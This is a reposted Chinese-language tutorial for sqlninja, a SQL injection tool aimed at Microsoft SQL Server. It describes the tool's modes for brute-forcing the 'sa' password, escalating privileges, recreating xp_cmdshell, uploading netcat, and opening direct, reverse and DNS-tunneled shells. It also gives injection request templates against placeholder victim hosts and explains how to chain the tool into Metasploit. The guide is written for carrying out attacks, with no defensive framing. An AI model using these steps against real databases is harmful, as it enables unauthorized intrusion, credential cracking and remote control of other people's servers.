sqlninja 说明 (转)

首先来介绍一下sqlninja的优点。

一个专门针对Microsoft SQL Server的sql注入工具
可找到远程SQL服务器的标志和特征(版本、用户执行的查询、用户特权、xp_cmdshell的可用性、身份验证模式等)
“sa”口令的强力攻击
如果找到口令后，就将特权提升到“sa”
如果原始的xp_cmdshell被禁用后，就创建一个定制的xp_cmdshell。
使用纯粹的ASCII GET/POST请求来上载netcat.exe程序(以及其它任何可执行的程序)，因此并不需要FTP连接。
为了找到目标网络的防火墙所允许的端口，可以实施针对目标SQL　服务器的TCP/UDP端口扫描。
逃避技术，这是为了使注入式代码“模糊”不清，并且混淆/绕过基于签名的IPS和应用层防火墙。
采用“盲目执行”攻击模式，在其它模式失效时，可以用于发布命令并执行诊断。
在sqlninja生成的SQL代码上，执行的是自动化的URL编码，这使得用户可以更精细地控制漏洞利用的字符串。
如果得到权限为sa，可以结合msf进一步对目标主机进行渗透。

sqlninja的一些常用命令.

./sqlninja
       -m <mode> : Required. Available modes are:  //加载modle
         t/test - test whether the injection is working   //测试注入点是否可用
         f/fingerprint - fingerprint user, xp_cmdshell and more
         b/bruteforce - bruteforce sa account //爆破sa口令用的。。可以-w指定字典，也可以不使用字典，这样sqlninja就会自己穷举
         e/escalation - add user to sysadmin server role
         x/resurrectxp - try to recreate xp_cmdshell  //尝试创建
         u/upload - upload a .scr file   //上传
         s/dirshell - start a direct shell  //获得一个目标主机的shell
         k/backscan - look for an open outbound port  //查找目标主机允许哪些端口外连
         r/revshell - start a reverse shell  //反弹shell
         d/dnstunnel - attempt a dns tunneled shell
         c/sqlcmd - issue a 'blind' OS command //执行系统命令，如果为sa的话直接可以net user
         m/metasploit - wrapper to Metasploit stagers  //配合msf使用
       -f <file> : configuration file (default: sqlninja.conf) //配置sqlninja.conf文件
       -p <password> : sa password
       -w <wordlist> : wordlist to use in bruteforce mode (dictionary methodonly) //字典文件的路径。。爆破sa密码用的
       -v : verbose output
       -d <mode> : activate debug //调试模式
         1 - print each injected command
         2 - print each raw HTTP request
         3 - print each raw HTTP response
         all - all of the above
在-f下面又有以下参数
   0 - Database version (2000/2005)   //检测当前数据库版本
   1 - Database user   //当前数据库用户
   2 - Database user rights  //当前数据库用户权限
   3 - Whether xp_cmdshell is working  //检查xp_cmdshell是否可以用
   4 - Whether mixed or Windows-only authentication is used  //是否windows本地系统权限
   a - All of the above  //以上所有选项
   h - Print this menu   //显示当前帮助菜单
   q - exit  //退出

刚开是搞的时候，在网上搜了半天的资料也没有找到怎么注入链接，参数里面没有像 sqlmap那样有 -u参数，最后才知道是在配置目录下的sqlninja.conf配置文件，打开配置文件后发现里面的选项特别

多，这里只是简单的进行注入，在配置文件中找到如下信息

# GET EXAMPLE:
--httprequest_start--
GET http://www.xxx.com/informationdetail.aspx?id=11&titleid=%e3h;__SQL2INJECT__ HTTP/1.1
Host: www.xxxx.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept:*/*
Accept-Language: en-us,en;q=0.7,it;q=0.3
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: Keep-alive
--httprequest_end--
#
# POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
# --httprequest_start--
# POST https://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
# Connection: close
#
# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
# --httprequest_end--
#
# HEADER-BASED EXAMPLE:
# --httprequest_start--
# GET http://www.victim.com/page.asp HTTP/1.0
# Host: www.victim.com
# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
# Accept-Language: en-us,en;q=0.7,it;q=0.3
# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
# Content-Type: application/x-www-form-urlencoded
# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
# Connection: close
# --httprequest_end--
#

这里有三种方式GET,POST,HEADER-BASED三个配置例子，根据你的注入点进行抓包判断，修改里面对应的信息，如果你会发现每个注入链接会有个;__SQL2INJECT__。所以在配置的时候不要忘记了加上。如果要使用其他的功能比如结合msf的话，请自行加上相应的配置，以上步骤配置完成后，就可以进行测试了。

用./sqlninja -m test命令检测注入点是否可用。成功的话会显示[+] Injection was successful! Let’s rock !! 那么就可以使用上面提到的命令。

使用./sqlninja -m metasploit命令可以和msf相结合起来，让渗透更加方便，如果使用metasploit里面的shellcode，这个默认是没有启用的，需要修改sqlninja.conf中metasploit配置位置修改 # Path to metasploit executable. Only needed if msfpayload and # msfcli are not already in the path msfpath = /pentest/exploits/framework3/ #去掉前面的注释符号，这里修改成你的framework3的安装位置。如果有写的不对的地方，欢迎留言更正。如果需要更详细的了解可以去http://sqlninja.sourceforge.net/sqlninja-howto.html 看看